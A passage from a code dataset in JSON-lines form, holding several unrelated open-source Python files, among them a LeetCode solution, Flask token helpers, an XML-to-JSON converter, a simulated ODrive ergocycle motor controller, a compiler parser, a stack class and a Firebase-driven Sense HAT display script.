__mul__(self, val: int | float | TimeDelta) -> float:\n if isinstance(val, TimeDelta):\n val = val.total_seconds()\n return val * self.per_second\n\n __rmul__ = __mul__\n","repo_name":"luhn/limited","sub_path":"limited/rate.py","file_name":"rate.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27616612433","text":"# -*- coding:utf-8 -*-\n__author__ = 'ShawDa'\n\n\nclass Solution:\n def addBinary(self, a, b):\n \"\"\"\n :type a: str\n :type b: str\n :rtype: str\n \"\"\"\n len_a, len_b = len(a), len(b)\n if len_b > len_a:\n return self.addBinary(b, a)\n list_a, list_b, flag = list(a)[::-1], list(b)[::-1], 0\n for i in range(len_a):\n if i >= len_b:\n break\n res = flag + int(list_a[i]) + int(list_b[i])\n if res == 3:\n flag = 1\n list_a[i] = '1'\n elif res == 2:\n flag = 1\n list_a[i] = '0'\n else:\n flag = 0\n list_a[i] = str(res)\n if flag == 0:\n return ''.join(list_a[::-1])\n for i in range(len_b, len_a):\n res = flag + int(list_a[i])\n if res == 2:\n flag = 1\n list_a[i] = '0'\n else:\n flag = 0\n list_a[i] = str(res)\n if flag == 1:\n list_a.append('1')\n return ''.join(list_a[::-1])\n","repo_name":"ShawDa/Coding","sub_path":"leetcode/067二进制求和.py","file_name":"067二进制求和.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31928717496","text":"import pandas as pd\nfrom functools import wraps\nfrom flask import request\nimport os\n\n\ndef ingestion_init_data(path_file_csv, sep, engine, table_name):\n \"\"\"\n insert data to database.\n\n Parameters:\n path_file_csv (string): path file csv\n sep (string): delimiter in csv file. Exp: ; or ,\n engine (database engine): engine database\n table_name: name's table to insert data\n\n \"\"\"\n df = pd.read_csv(path_file_csv, sep=sep)\n df.to_sql(name=table_name, con=engine, if_exists='replace', index=False)\n\n\ndef token_required(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n token = None\n\n if \"X-API-KEY\" in request.headers:\n token = request.headers[\"X-API-KEY\"]\n\n if not token:\n return {\"message\": \"Token is missing !!!\"}, 401\n if token != os.getenv(\"TOKEN\"):\n return {\"message\": \"Token is wrongs !!!\"}, 401\n\n return f(*args, **kwargs)\n return decorated\n","repo_name":"nguyenkhacbaoanh/Messier-Catalogue","sub_path":"app/main/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17579851309","text":"# file: xml_parse.py\n# author: Cedric Wille cwille97@bu.edu\n# description: Helper functions to convert XML data from the NTSB website into JSON format\n# date: 7/15/20\n\n# data we are parsing is a big XML download from: https://www.ntsb.gov/investigations/AccidentReports/_layouts/ntsb.aviation/Index.aspx\n\nimport json\n\ndef json_format(input):\n '''A helper function to convert the XML pairs to JSON key value pairs'''\n\n ret = ''\n splitVals = input.split('\"') \n counter = 1 # counter to keep track of whether we are on the key or value part of the kv pair\n for val in splitVals:\n if (counter % 2 == 0): # even count so it is a value part of the key value pair\n val = '\"' + val + '\"'\n if val != splitVals[-2]: # we don't want to add a comma to the last value\n val += ', '\n ret += val\n else: # odd count so it is the key part which means we need to add quotes and a colon\n if val != '':\n val = val.replace(' ', '', 1) # remove space at front\n val = val.replace('=', '')\n val = '\"' + val + '\":'\n ret += val\n counter += 1\n ret = ret[:-5]\n return ret\n\n\ndef parse_initial_data(original, results): \n '''This function is designed to take the original XML file as downloaded from the NTSB website and parse it into JSON'''\n xml_data = open(original, \"r\")\n results = open(results, \"w\")\n results.write('{ \"items\": [')\n for line in xml_data:\n rows = line.split(\"', '') # remote tags\n row = row.replace('\\\\', '/') # replace backslahes with a forward slash because backslash is a Python escape character\n newStr = \"{ \" + json_format(row) + \" }, \" # add brackets for this piece of data and call our helper function\n newStr = newStr.replace('\"\":', '')\n results.write(newStr)\n\n xml_data.close()\n results.write(\"] }\")\n results.close()\n print(\"finished converting the XML data to JSON\")\n\n# parse_initial_data('AviationData.xml', 'xml_results.json')\n\ndef check_json(filename):\n '''Function to check if this is valid JSON by printing the JSON values corresponding to the string'''\n json_data = open(filename, 'r')\n for line in json_data:\n data = json.loads(line)\n print(data)\n\n# check_json('xml_results.json')\n\n","repo_name":"FaisalBinAhmed/Aviation-Accident-API","sub_path":"xml_parse.py","file_name":"xml_parse.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71514511914","text":"import progressbar\nimport math\n\nbar = None\n\n\ndef init(max_epoch, batch_size, N, custom_text_dict):\n global bar\n\n bar = BarWrapper(max_epoch, batch_size, N, custom_text_dict)\n\n\nclass BarWrapper:\n def __init__(self, max_epoch, batch_size, N, custom_text_dict):\n self.current_epoch = 0\n self.current_batch = 0\n\n self.max_batch = int(math.ceil(N / batch_size))\n max_value = max_epoch * self.max_batch\n\n base_text = '(Epoch: [%(epoch)d/%(max_epoch)d], Batch: [%(batch)d/%(max_batch)d]) '\n base_dict = dict(epoch=1, max_epoch=max_epoch, batch=1, max_batch=self.max_batch)\n\n custom_text = ''\n for key, value in custom_text_dict.items():\n custom_text += \"{} = %({}).6f, \".format(value, key)\n base_dict[key] = -1\n\n self.format_custom_text = progressbar.FormatCustomText(\n base_text + custom_text, base_dict,\n )\n\n widgets = [\n progressbar.Percentage(), ' ',\n progressbar.AnimatedMarker(), ' ',\n progressbar.Bar(marker='█'), ' ',\n progressbar.SimpleProgress(), ' ',\n self.format_custom_text, ' ',\n progressbar.ETA()\n ]\n\n self.bar = progressbar.ProgressBar(max_value=max_value, widgets=widgets)\n self.bar.start()\n\n def next_batch(self, custom_data):\n self.current_batch += 1\n\n if self.current_batch == self.max_batch + 1:\n self.current_batch = 1\n self.current_epoch += 1\n\n self.format_custom_text.update_mapping(\n epoch=self.current_epoch,\n batch=self.current_batch)\n\n self.format_custom_text.update_mapping(**custom_data)\n\n self.bar += 1\n\n def finish(self):\n progressbar.streams.flush()\n self.bar.finish()\n","repo_name":"JeGa/deepsplitting","sub_path":"python/deepsplitting/utils/global_progressbar.py","file_name":"global_progressbar.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9062872931","text":"# Module to run tests on scripts\n\n# TEST_UNICODE_LITERALS\n\nimport pytest\nimport os\n\nfrom specdb.specdb import IgmSpec\nfrom specdb import ssa as spdb_ssa\n\n#version = 'v01'\nversion = 'v02'\n\ndef data_path(filename):\n data_dir = os.path.join(os.path.dirname(__file__), 'files')\n return os.path.join(data_dir, filename)\n\ndef test_sdss_ssa_querydata():\n if os.getenv('SPECDB') is None: # Would need to generate a new debug file for this to work..\n assert True\n return\n igmsp = IgmSpec()#db_file=db_file)\n #\n ssa = spdb_ssa.SSAInterface(igmsp)\n votable = ssa.querydata('0.027228,0.515341', SIZE=1e-3)\n # Write\n votable.to_xml('sdss_querydata.xml')\n\n\ndef test_chalos_ssa_querydata():\n \"\"\" Mixes COS and HIRES\n \"\"\"\n if os.getenv('SPECDB') is None: # Would need to generate a new debug file for this to work..\n assert True\n return\n igmsp = IgmSpec()#db_file=db_file)\n #\n ssa = spdb_ssa.SSAInterface(igmsp)\n votable = ssa.querydata('344.4092,13.6793', SIZE=1e-3)\n # Write\n votable.to_xml('cos_querydata.xml')\n\n","repo_name":"specdb/igmspec","sub_path":"igmspec/tests/test_ssa.py","file_name":"test_ssa.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"19263691867","text":"\"\"\"\nThis code is used to test the GUI mechanics without any ODrive connected. It may not be up-to-date.\n\"\"\"\nimport time\nimport json\nimport copy\nimport numpy as np\nfrom pathlib import Path\n\nfrom ergocycleS2M.data_processing.save import save\nfrom ergocycleS2M.motor_control.enums import (\n ControlMode,\n control_modes_based_on_torque,\n control_modes_based_on_cadence,\n DirectionMode,\n)\nfrom ergocycleS2M.motor_control.motor_computations import MotorComputations\n\n\nparameters_path = Path(__file__).resolve().parent.parent / \"parameters\"\n\n\nclass Phantom(MotorComputations):\n \"\"\"\n Represents phantom class of the MotorController class: no odrive board need to be connected to use this class.\n \"\"\"\n\n def __init__(\n self,\n enable_watchdog=True,\n external_watchdog: bool = False,\n gains_path: str = str(parameters_path / \"gains.json\"),\n file_path: str = None,\n ):\n super(Phantom, self).__init__()\n self._watchdog_is_ready = False\n self._external_watchdog = external_watchdog\n self._watchdog_timeout = self.hardware_and_security[\"watchdog_timeout\"]\n self._watchdog_feed_time = self.hardware_and_security[\"watchdog_feed_time\"]\n print(\"Look for an odrive ...\")\n print(\"Odrive found\")\n self._watchdog_is_ready = self.config_watchdog(enable_watchdog)\n\n self._control_mode = ControlMode.STOP\n self._relative_pos = 0\n self._direction = DirectionMode.FORWARD\n self.previous_control_mode = ControlMode.STOP\n\n self._gains_path = gains_path\n\n if file_path:\n self.file_path = file_path\n else:\n self.file_path = \"XP/last_XP\"\n self.first_save = True\n self.t0 = 0.0\n\n def erase_configuration(self):\n \"\"\"\n Resets all config variables to their default values and reboots the controller.\n fibre.libfibre.ObjectLostError \"[LEGACY_OBJ] protocol failed with 3 - propagating error to application\" is not\n an issue.\n \"\"\"\n pass\n\n def save_configuration(self):\n \"\"\"\n Saves the current configuration to non-volatile memory and reboots the board.\n fibre.libfibre.ObjectLostError \"[LEGACY_OBJ] protocol failed with 3 - propagating error to application\" is not\n an issue.\n \"\"\"\n pass\n\n def config_watchdog(self, enable_watchdog: bool, watchdog_timeout: float = None):\n \"\"\"\n Configures a watchdog. If the odrive does not receive a watchdog before the time given in watchdog_timeout, it\n will disconnect.\n\n Parameters\n ----------\n enable_watchdog: bool\n Indicates if the user wants to enable the watchdog (True) or not (False)\n watchdog_timeout: float\n Maximum duration since the last feeding in s. If the watchdog has not been fed for more than\n `watchdog_timeout` the Odrive unable the motor.\n\n Returns\n -------\n watchdog_is_ready: bool\n Indicates if the watchdog is enabled or not\n \"\"\"\n if enable_watchdog:\n return True\n else:\n return False\n\n def _internal_watchdog_feed(self):\n \"\"\"\n Feeds the watchdog. To be called by a daemon thread.\n \"\"\"\n while True:\n time.sleep(self._watchdog_feed_time)\n\n def watchdog_feed(self):\n \"\"\"\n Feeds the watchdog. To be called by the user.\n \"\"\"\n pass\n\n def calibration(self, mechanical_load: bool = True):\n \"\"\"\n Calibrates the Odrive. It is advised to do one first full calibration under no mechanical load and to do a\n controller calibration under mechanical load each time the Odrive is turned on.\n\n Parameters\n ----------\n mechanical_load: bool\n Indicates if the motor is under mechanical load (True) or not (False).\n \"\"\"\n print(\"Start motor calibration\")\n print(\"Calibration done\")\n\n def has_error(self):\n \"\"\"\n Indicates if one or several errors has been detected (True) or not (False).\n \"\"\"\n return False\n\n def configuration(self):\n \"\"\"\n Configures the Odrive.\n \"\"\"\n print(\"Configuration for HALL encoder\")\n\n self.hardware_and_security_configuration()\n self.gains_configuration(custom=False)\n\n print(\"Configuration done\")\n\n def gains_configuration(\n self,\n custom: bool,\n pos_gain: float = None,\n k_vel_gain: float = None,\n k_vel_integrator_gain: float = None,\n current_gain: float = None,\n current_integrator_gain: float = None,\n bandwidth: float = None,\n ):\n \"\"\"\n custom: bool\n Indicates if the user wants to use the previously calculated gains saved in the .json (False) or to modify\n manually the gains (True).\n pos_gain: float\n k_vel_gain: float\n k_vel_integrator_gain: float\n current_gain: float\n current_integrator_gain: float\n bandwidth: float\n \"\"\"\n if not custom:\n with open(self._gains_path, \"r\") as gain_file:\n gains = json.load(gain_file)\n\n pos_gain = gains[\"pos_gain\"]\n k_vel_gain = gains[\"k_vel_gain\"]\n k_vel_integrator_gain = gains[\"k_vel_integrator_gain\"]\n current_gain = None\n current_integrator_gain = None\n bandwidth = gains[\"bandwidth\"]\n\n self.save_configuration()\n\n def hardware_and_security_configuration(self):\n \"\"\"\n Configures the settings linked to the hardware or the security not supposed to be changed by the user.\n \"\"\"\n pass\n\n def get_sign(self):\n \"\"\"\n Set the sign of the rotation depending on the rotation direction (reverse or forward).\n \"\"\"\n if self._direction == DirectionMode.FORWARD:\n return 1\n else:\n return -1\n\n def set_direction(self, mode: str):\n \"\"\"\n Set the direction to forward or reversed.\n\n Parameters\n ----------\n\n mode: DirectionMode\n \"\"\"\n self._direction = DirectionMode(mode)\n\n def get_direction(self):\n \"\"\"\n Get the direction.\n\n Returns\n -------\n mode: DirectionMode\n \"\"\"\n return self._direction\n\n def _check_ramp_rate(self, ramp_rate):\n \"\"\"\n Check that the acceleration registered by the user is under the acceleration limit.\n\n Parameters\n ----------\n ramp_rate: float\n Acceleration of the pedals (rpm/s)\n \"\"\"\n pass\n\n def turns_control(self, turns: float = 0.0):\n \"\"\"\n Makes the motors turn for the indicated number of turns.\n\n Parameters\n ----------\n turns: float\n The number of turns the motor will do.\n \"\"\"\n pass\n\n def zero_position_calibration(self):\n \"\"\"\n Calibration for the 0 deg.\n \"\"\"\n pass\n\n def position_control(self, angle: float = 0.0):\n \"\"\"\n Leads the motors to the indicated angle.\n\n Parameters\n ----------\n angle: float\n The angle the motor must go to ([-180.0, 360.0] deg)\n \"\"\"\n pass\n\n def cadence_control(\n self,\n cadence: float = 0.0,\n cadence_ramp_rate: float = 5,\n control_mode: ControlMode = ControlMode.CADENCE_CONTROL,\n ):\n \"\"\"\n Sets the motor to a given cadence in rpm of the pedals with velocities ramped at each change.\n\n Parameters\n ----------\n cadence: float\n Targeted cadence in rpm of the pedals.\n cadence_ramp_rate: float\n cadence ramp rate in rpm/s of the pedals.\n control_mode: ControlMode\n Control mode of the motor.\n \"\"\"\n cadence = abs(cadence)\n\n self._check_ramp_rate(cadence_ramp_rate)\n\n if self._control_mode not in control_modes_based_on_cadence:\n self.stopping()\n self.stopped()\n\n self._control_mode = control_mode\n\n return self.get_sign() * cadence\n\n def torque_control(\n self,\n user_torque: float = 0.0,\n torque_ramp_rate: float = 2.0,\n resisting_torque: float = None,\n control_mode: ControlMode = ControlMode.TORQUE_CONTROL,\n ):\n \"\"\"\n Set the odrive in torque control, choose the torque and start the motor.\n\n Parameters\n ----------\n user_torque: float\n Torque of the user (Nm) at the pedals.\n torque_ramp_rate: float\n Torque ramp rate (Nm/s) at the pedals.\n resisting_torque: float\n Resisting torque at the pedals (Nm).\n If the variable `torque` is absolute, set resisting_torque to 0.0.\n control_mode: ControlMode\n Control mode to use.\n\n Returns\n -------\n The input torque (Nm) at the pedals.\n \"\"\"\n # If the user is not pedaling yet or if he has stopped pedaling, the motor is stopped.\n vel_estimate = 0.0\n # `vel_estimate` is negative if pedaling forward, positive if pedaling backward.\n if (self._direction == DirectionMode.FORWARD and vel_estimate >= 0) or (\n self._direction == DirectionMode.REVERSE and vel_estimate <= 0\n ):\n input_motor_torque = motor_torque = 0.0\n torque_ramp_rate_motor = 100.0\n # If the user is pedaling, the torque and torque_ramp values have to be translated to the motor.\n else:\n # TODO: Check if the torque ramp rate is correct\n torque_ramp_rate_motor = torque_ramp_rate * self._reduction_ratio\n\n # The motor can be controlled with the computed values\n if self._control_mode not in control_modes_based_on_torque:\n self.stopping()\n self.stopped()\n\n # In case the previous control mode was based on torque control but was not `TORQUE_CONTROL`,\n # self._control_mode is updated.\n self._control_mode = control_mode\n\n return motor_torque # Nm at the pedals\n\n def concentric_power_control(\n self, power: float = 0.0, torque_ramp_rate: float = 2.0, resisting_torque: float = None\n ):\n \"\"\"\n # TODO add docstring in all to explain to call in a thread.\n Parameters\n ----------\n power: float\n Power (W) at the pedals.\n torque_ramp_rate: float\n Torque ramp rate (Nm/s) at the pedals.\n resisting_torque: float\n Resisting torque at the pedals (Nm).\n If the variable `torque` is absolute, set resisting_torque to 0.0.\n\n Returns\n -------\n The input torque (Nm) at the pedals.\n \"\"\"\n cadence = 0.0 # rad/s\n if cadence == 0:\n return self.torque_control(0.0, torque_ramp_rate, resisting_torque, ControlMode.CONCENTRIC_POWER_CONTROL)\n else:\n return self.torque_control(\n min(abs(power) / cadence, self.hardware_and_security[\"torque_lim\"]),\n torque_ramp_rate,\n resisting_torque,\n ControlMode.CONCENTRIC_POWER_CONTROL,\n )\n\n def eccentric_power_control(self, power: float = 0.0, cadence_ramp_rate: float = 5.0, cadence_max: float = 50.0):\n \"\"\"\n Parameters\n ----------\n power: float\n Power (W) at the pedals.\n cadence_ramp_rate: float\n cadence ramp rate (rpm/s) at the pedals.\n cadence_max: float\n Maximum cadence rpm at the pedals, if no torque is applied or if the torque < power / cadence_max.\n\n Returns\n -------\n The input torque (Nm) at the pedals.\n \"\"\"\n torque = self.get_user_torque()\n\n # If the user is not forcing against the motor, the motor goes to the maximum cadence.\n if (self._direction == DirectionMode.REVERSE and torque >= 0) or (\n self._direction == DirectionMode.FORWARD and torque <= 0\n ):\n self.cadence_control(cadence_max, cadence_ramp_rate, ControlMode.ECCENTRIC_POWER_CONTROL)\n return np.inf # So we know that the user is not forcing.\n else:\n cadence = min(abs(power / torque) / 2 / np.pi * 60, cadence_max)\n return self.cadence_control(cadence, cadence_ramp_rate, ControlMode.ECCENTRIC_POWER_CONTROL)\n\n def linear_control(self, linear_coeff: float = 0.0, torque_ramp_rate: float = 2.0, resisting_torque: float = None):\n \"\"\"\n Parameters\n ----------\n linear_coeff: float\n Linear coefficient (Nm/rpm) at the pedals.\n torque_ramp_rate: float\n Torque ramp rate (Nm/s) at the pedals.\n resisting_torque: float\n Resisting torque at the pedals (Nm).\n If the variable `torque` is absolute, set resisting_torque to 0.0.\n\n Returns\n -------\n The input torque (Nm) at the pedals.\n \"\"\"\n cadence = abs(self.get_cadence()) # rpm\n return self.torque_control(\n min(cadence * abs(linear_coeff), self.hardware_and_security[\"torque_lim\"]),\n torque_ramp_rate,\n resisting_torque,\n ControlMode.LINEAR_CONTROL,\n )\n\n def stopping(\n self,\n cadence_ramp_rate: float = 30,\n ):\n \"\"\"\n Starts the stopping sequence of the motor.\n\n Parameters\n ----------\n cadence_ramp_rate: float\n The ramp_rate of the deceleration (rpm/s of the pedals).\n \"\"\"\n self.previous_control_mode = copy.deepcopy(self._control_mode)\n\n self._check_ramp_rate(cadence_ramp_rate)\n\n self._control_mode = ControlMode.STOPPING\n\n def stopped(self):\n \"\"\"\n Running until the motor is fully stopped. Can be executed in another thread or process.\n\n Returns\n -------\n True when the motor has stopped.\n \"\"\"\n self._control_mode = ControlMode.STOP\n\n return True\n\n def stop(\n self,\n vel_stop: float = 10.0,\n cadence_ramp_rate: float = 30,\n ):\n \"\"\"\n Stops the motor gently.\n\n Parameters\n ----------\n vel_stop: float\n The cadence at which the motor will be stopped if it was turning (rpm of the pedals).\n cadence_ramp_rate: float\n The ramp_rate of the deceleration (rpm/s of the pedals).\n \"\"\"\n if vel_stop > self.hardware_and_security[\"maximal_cadence_stop\"]:\n raise ValueError(\n f\"The maximal cadence at which the motor can be stopped is \"\n f\"{self.hardware_and_security['maximal_cadence_stop']} rpm for the pedals.\"\n f\"Stop cadence specified: {abs(vel_stop)} rpm for the pedals\"\n )\n\n self.stopping(cadence_ramp_rate)\n\n while abs(self.get_cadence()) > vel_stop:\n pass\n\n self.stopped()\n\n def get_control_mode(self):\n \"\"\"\n Returns the current control mode.\n \"\"\"\n return self._control_mode\n\n def get_angle(self):\n \"\"\"\n Returns the estimated angle in degrees. A calibration is needed to know the 0.\n \"\"\"\n return self.compute_angle(self.get_turns())\n\n def get_turns(self):\n \"\"\"\n Returns the estimated number of turns.\n \"\"\"\n return 20 * np.sin(time.time() - self._relative_pos)\n\n def get_cadence(self) -> float:\n \"\"\"\n Returns the estimated cadence of the pedals in rpm.\n \"\"\"\n return self.compute_cadence(20 * np.sin(time.time()))\n\n def get_electrical_power(self):\n \"\"\"\n Returns the electrical power in W.\n \"\"\"\n return 20 * np.sin(time.time())\n\n def get_mechanical_power(self):\n \"\"\"\n Returns the mechanical power in W.\n \"\"\"\n return 20 * np.sin(time.time())\n\n def get_user_power(self):\n \"\"\"\n Returns the user mechanical power in W.\n \"\"\"\n return self.compute_user_torque(self.get_user_torque(), self.get_cadence())\n\n def get_iq_setpoint(self):\n \"\"\"\n Returns the commanded motor current in A.\n \"\"\"\n return 20 * np.sin(time.time())\n\n def get_iq_measured(self):\n \"\"\"\n Returns the measured motor current in A.\n \"\"\"\n return 20 * np.sin(time.time())\n\n def get_measured_torque(self):\n \"\"\"\n Returns the measured torque.\n \"\"\"\n return 20 * np.sin(time.time())\n\n def get_motor_torque(self):\n \"\"\"\n Returns the measured torque.\n \"\"\"\n return self.compute_motor_torque(20 * np.sin(time.time()))\n\n def get_resisting_torque(self):\n \"\"\"\n Returns the resisting torque.\n \"\"\"\n return self.compute_resisting_torque(\n 20 * np.sin(time.time()),\n 20 * np.sin(time.time()),\n )\n\n def get_user_torque(self):\n \"\"\"\n Returns the measured user torque (the resisting torque is subtracted from the motor_torque).\n \"\"\"\n return self.compute_user_torque(\n 20 * np.sin(time.time()),\n 20 * np.sin(time.time()),\n )\n\n def get_errors(self):\n \"\"\"\n Returns the errors.\n \"\"\"\n return \"\"\n\n def save_data_to_file(\n self,\n file_path: str,\n spin_box: float = None,\n instruction: float = None,\n ramp_instruction: float = None,\n comment: str = \"\",\n stopwatch: float = 0.0,\n lap: float = 0.0,\n ):\n \"\"\"\n Saves data.\n \"\"\"\n if self.first_save:\n self.t0 = time.time()\n self.first_save = False\n\n data = {\n \"comments\": comment,\n \"stopwatch\": stopwatch,\n \"lap\": lap,\n \"spin_box\": spin_box,\n \"instruction\": instruction,\n \"ramp_instruction\": ramp_instruction,\n \"time\": time.time() - self.t0,\n \"user_torque\": self.get_user_torque(),\n \"cadence\": self.get_cadence(),\n \"angle\": self.get_angle(),\n \"turns\": self.get_turns(),\n \"user_power\": self.get_user_power(),\n \"control_mode\": self._control_mode.value,\n \"direction\": self._direction.value,\n \"iq_setpoint\": self.get_iq_setpoint(),\n \"iq_measured\": self.get_iq_measured(),\n \"measured_torque\": self.get_measured_torque(),\n \"motor_torque\": self.get_motor_torque(),\n \"resisting_torque\": self.get_resisting_torque(),\n \"mechanical_power\": self.get_mechanical_power(),\n \"electrical_power\": self.get_electrical_power(),\n }\n\n save(data, file_path)\n\n def minimal_save_data_to_file(\n self,\n file_path: str,\n spin_box: float = None,\n instruction: float = None,\n ramp_instruction: float = None,\n comment: str = \"\",\n stopwatch: float = 0.0,\n lap: float = 0.0,\n training_mode: str = \"\",\n ):\n \"\"\"\n Saves data.\n \"\"\"\n if self.first_save:\n self.t0 = time.time()\n self.first_save = False\n\n data = {\n \"time\": time.time() - self.t0,\n \"spin_box\": spin_box,\n \"instruction\": instruction,\n \"ramp_instruction\": ramp_instruction,\n \"comments\": comment,\n \"stopwatch\": stopwatch,\n \"lap\": lap,\n \"control_mode\": self._control_mode.value,\n \"direction\": self._direction.value,\n \"training_mode\": training_mode,\n \"turns\": self.get_turns(),\n }\n\n save(data, file_path)\n","repo_name":"s2mLab/ControlOdrive","sub_path":"ergocycleS2M/motor_control/phantom.py","file_name":"phantom.py","file_ext":"py","file_size_in_byte":19741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44290359544","text":"from goto import *\nfrom action import *\nfrom funcoes_auxiliares_sintatico import *\nfrom recuperacao_de_erro import *\nfrom regras import Regras\nfrom scanner import Scanner\nfrom tabela_de_estados import TabelaDeEstados\nfrom tabela_de_simbolos import TabelaDeSimbolos\nfrom semantico import *\nfrom semantico import Semantico\nfrom funcoes_auxiliares_semantico import *\n\n\nclass Parser2:\n def __init__(self):\n self.pilha = [0]\n self.regras = Regras()\n self.scanner = Scanner(\"codigo.txt\")\n self.tabelaEstados = TabelaDeEstados()\n self.tabelaDeSimbolos = TabelaDeSimbolos()\n self.Semantico = Semantico('', '', 0)\n \n \n\n\n def buscarProximoToken(self, listaDeTokens): \n retornoScanner = self.scanner.SCANNER(self.tabelaEstados, self.tabelaDeSimbolos)\n if retornoScanner.classe != 'ERROR':\n listaDeTokens.append(retornoScanner)\n return 1\n else:\n retornoScanner = self.buscarProximoToken(listaDeTokens)\n return 0\n \n def PARSER(self):\n listaDeTokens = []\n mainAction()\n\n self.buscarProximoToken(listaDeTokens)\n index = 0\n token = listaDeTokens[index]\n\n a = token.classe.lower()\n \n while True:\n s = self.pilha[-1]\n acao = action(s,a)\n t = acao[1:]\n \n if('s' in acao):\n self.pilha.append(int(t))\n \n self.Semantico.pilha_semantica.append(token)\n \n val = self.buscarProximoToken(listaDeTokens)\n index += 1\n token = listaDeTokens[index]\n a = token.classe.lower()\n\n elif('R' in acao):\n\n A, B, regra = self.regras.retornaElementos(t)\n \n taux = t\n \n for element in B:\n desempilhar(self.pilha)\n \n\n \n t = self.pilha[-1]\n \n self.pilha.append(int(goto(int(t),A)))\n \n #print('Produção: ', regra)\n \n var_semantico = self.Semantico.ativa_semantico(taux, A, B, token, self.tabelaDeSimbolos)\n \n for i in range(len(B)):\n desempilhar(self.Semantico.pilha_semantica)\n \n self.Semantico.pilha_semantica.append(var_semantico)\n \n #print(f' ============== {self.Semantico.pilha_semantica}')\n \n elif('a' in acao):\n print('ACCEPT')\n print(self.tabelaDeSimbolos.imprimirTabela())\n #print(self.Semantico.programa_objeto)\n inicia_arquivo_objeto(self.Semantico.programa_objeto, self.Semantico.variaveis_temporarias)\n break\n \n else:\n sucessoPhraseRecovery = phraseRecovery(s, index, listaDeTokens, self.buscarProximoToken, self.scanner.linha2, self.scanner.coluna2)\n if(sucessoPhraseRecovery == False):\n index = panicMode(s, self.buscarProximoToken, listaDeTokens, index, self.scanner.linha, self.scanner.coluna)\n \n token = listaDeTokens[index]\n a = token.classe.lower()\n\n if (a == 'eof'):\n break","repo_name":"gilsonreisf/Compiladores","sub_path":"parser_2.py","file_name":"parser_2.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3981078080","text":"# stack ADT\n\n# Fixed Array implementation\n# struct stack{\n# int arr[];\n# int top;\n# int maxsize;\n# }\n\nclass Stack:\n def __init__(self, maxsize):\n self.maxsize = maxsize\n self.arr = [None for i in range(maxsize)]\n # keep track of the number of elements\n self.top = 0\n\n def peek(self):\n return self.arr[self.top - 1]\n\n def is_empty(self):\n return self.top == 0\n\n def push(self, x):\n # if the stack is full\n if self.top == self.maxsize:\n # handle overflow error\n print(\"The stack is full\")\n # if the stack is not full\n else:\n # add the element\n self.arr[self.top] = x\n self.top += 1\n\n def pop(self):\n # if the stack is empty\n if self.is_empty():\n # handle underflow error\n print(\"The stack is empty\")\n # if the stack is not empty\n else:\n # Last in First Out\n # return the popped value\n x = self.arr[self.top - 1]\n self.top -= 1\n return x\n\n def display(self):\n if self.is_empty():\n print(\"The stack is empty\")\n else:\n print(\"The elements in the stack are: \", end=\" \")\n for i in range(self.top):\n print(self.arr[i], end=\" \")\n print()\n","repo_name":"chriskokc/stack-ADT","sub_path":"array_stack.py","file_name":"array_stack.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18132059887","text":"\"\"\"\n==============================================\nARCADE CHARACTER GENERATOR\n==============================================\nCourse: Web Of Things (WOT)\nOption: New Media Development\nDepartment: Graphic and Digital Media\nCollege: Artevelde University College Ghent\n----------------------------------------------\nAuthors:\n - Brent De Roeck\n - Adriaan Glibert\n----------------------------------------------\nResources:\n - https://firebase.google.com/docs/admin/setup\n - https://pythonhosted.org/sense-hat/\n==============================================\n\"\"\"\n\n\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import db\nfrom sense_hat import SenseHat\n\nsense = SenseHat()\nsense.clear()\n\ncred = credentials.Certificate('arcadegenerator-firebase-adminsdk-a1og2-e4d47303df.json')\ndefault_app = firebase_admin.initialize_app(cred,{\n 'databaseURL': 'https://arcadegenerator.firebaseio.com'\n })\n\n\nroot = db.reference()\n#getting the matrices table from the database\nmatrices = db.reference('/matrices').get()\npixelsInfo = matrices[\"matrix-01\"][\"pixels\"]\nsplitPixelsInfo = pixelsInfo.split('-')\n\nfor pixel in splitPixelsInfo:\n values = pixel.strip('[').strip(']').replace(\" \",\"\").split(\",\")\n sense.set_pixel(int(values[0]), int(values[1]), int(values[2]), int(values[3]), int(values[4])) \n\n","repo_name":"gdmgent-1718-wot/ArcadeCharacterGenerator","sub_path":"raspberry/arcade.py","file_name":"arcade.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72762505194","text":"from django.views.generic import TemplateView\nfrom django.shortcuts import get_object_or_404\nfrom django.utils.timezone import now\nfrom django.contrib.auth import get_user_model\n\nfrom med_social.decorators import member_required, login_required\n\nfrom .emails.views import RequestUpdateEmail\nfrom .models import UpdateRequest\nfrom .forms import BatchRequestUpdateForm\n\n\nclass RequestUpdateView(TemplateView):\n template_name = 'availability/partials/last_updated.html'\n\n def dispatch(self, *args, **kwargs):\n user_pk = self.kwargs['user_pk']\n if self.request.user.is_vendor:\n self.object =\\\n get_object_or_404(get_user_model(), id=user_pk,\n vendor=self.request.user.vendor)\n else:\n self.object = get_object_or_404(get_user_model(), id=user_pk)\n return super(RequestUpdateView, self).dispatch(*args, **kwargs)\n\n def get_context_data(self):\n ctx = super(RequestUpdateView, self).get_context_data()\n ctx.update({\n 'update_requested': True,\n 'for_user': self.object\n })\n return ctx\n\n def post(self, request, user_pk):\n 